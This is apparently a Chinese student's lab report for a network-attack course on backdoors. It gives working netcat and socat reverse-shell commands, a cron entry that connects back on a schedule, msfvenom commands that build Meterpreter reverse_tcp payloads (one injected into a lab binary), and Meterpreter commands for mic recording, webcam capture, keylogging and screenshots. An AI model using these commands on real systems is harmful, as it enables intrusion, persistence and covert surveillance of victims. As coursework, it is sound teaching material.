Exp2-后门原理与实践

一、实践目标

 

  • 使用netcat实现win,kali间的后门连接
  • 使用socat实现win,kali间的后门连接
  • meterpreter的应用

 

 

 

二、实验过程

1.使用netcat获取主机操作Shell,cron启动

(1)Windows获取kali的shell

命令行输入ipconfig获取Windows的主机IP

主机IP为192.168.1.5

 

在主机中输入ncat.exe -l -p 1202 监听本机端口1202

 

在kali中输入nc 192.168.1.5 1202 -e /bin/sh 连接主机反弹shell

 

在Windows中返回kali的shell

 

(2)kali获取Windows的shell

输入ifconfig获取kali的IP

 

在虚拟机中用nc -l -p 1202监听主机1202端口

 

主机输入ncat -e cmd 192.168.1.7 1202进行反弹连接

 

成功获取主机shell

 

(3)启动cron并在主机监听

 

在最后一行添加49 * * * * /bin/netcat 192.168.1.5 1202 -e /bin/sh,即在每个小时的第49分钟反向连接Windows主机的1202端口

 

在主机中输入ncat -l -p 1202,等到指定时间就能获取kali的shell

 

2.使用socat获取主机操作Shell, 任务计划启动

在Windows中打开计算机管理,使用任务计划程序新建任务

 

新建触发器

 

新建操作,输入参数“tcp-listen:1202 exec:cmd.exe,pty,stderr”

 

在kali中输入

socat - tcp:192.168.1.5:1202

成功获取shell

 

3.使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

输入

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.7 LPORT=1202 -f exe > 20191202.exe

生成20191202.exe

 

在Windows上打开监听

 

在Kali上用nc 192.168.1.5 1202 < 20191202.exe将生成的20191202.exe后门程序传过去

 

在kali中输入msfconsole,并依次输入

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.1.7
set LPORT 1202

 

通过show option查看配置后的情况

 

输入exploit进行监听,Windows中打开20191202.exe,成功获取shell

 

4.使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权

(1)获取主机音频

输入record_mic指令进行录音(-d可设置时长)

 

(2)获取主机摄像头

输入webcam_snap指令控制摄像头进行拍照

输入run webcam可以进行屏幕录制,相当于不间断地用摄像头拍照片,并不断存储在一个jpg中

 

(3)获取击键记录

输入keyscan_start开始捕获键盘记录,keyscan_dump获取击键记录(-d可设置时长)

 

(4)获取主机截屏

使用screenshot指令可以进行截屏

 

5.使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.7 LPORT=1202 -x pwn1 -f elf > 20191202-pwn

 

输入msfconsole进入MSF控制台依次输入

use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp
set LHOST 192.168.1.7
set LPORT 1202

输入exploit进行监听

 

在另一个终端打开20191202-pwn,需要先修改权限

 

成功getshell

 

三、基础问题回答

 

1.例举你能想到的一个后门进入到你系统中的可能方式?

在非正规渠道下载软件;在电脑中插入无法判断是否安全的U盘;扫来读不明的二维码。

 

2.例举你知道的后门如何启动起来(win及linux)的方式?

win:在重启电脑时自动启动;与某些程序、插件捆绑,当启动这些程序、插件时就启动。

Linux:通过定时任务启动;与一些程序捆绑启动。

 

3.Meterpreter有哪些给你映像深刻的功能?

截屏、获取键盘敲击记录、打开摄像头

 

4.如何发现自己有系统有没有被安装后门?

通过杀毒软件进行全盘扫描;打开任务管理器看看那些运行的进程;通过应用历史记录查看应用的使用记录。

 

四、实验体会

本次实验让我对后门程序有了一定的了解,虽然这个后门程序只有在关闭杀毒软件的情况下才能生效,但当我通过Meterpreter获得主机的权限时,就感受到了网络对抗这门课的魅力,就像打开新世界的大门一样。在实验中,我也因为输错一些指令而遇到麻烦,另一些问题也在云班课的讨论区获得了答案。在用MFS生成shellcode注入pwn中时,因为监听环境从windows变成Linux,所以“set payload windows/meterpreter/reverse_tcp”这条指令需要修改。但我当时没注意这个地方,导致最后一直在获取Windows的shell,因此做实验时还需要认真。

posted @ 2022-04-01 20:59  20191202王皓岩  阅读(55)  评论(0编辑  收藏  举报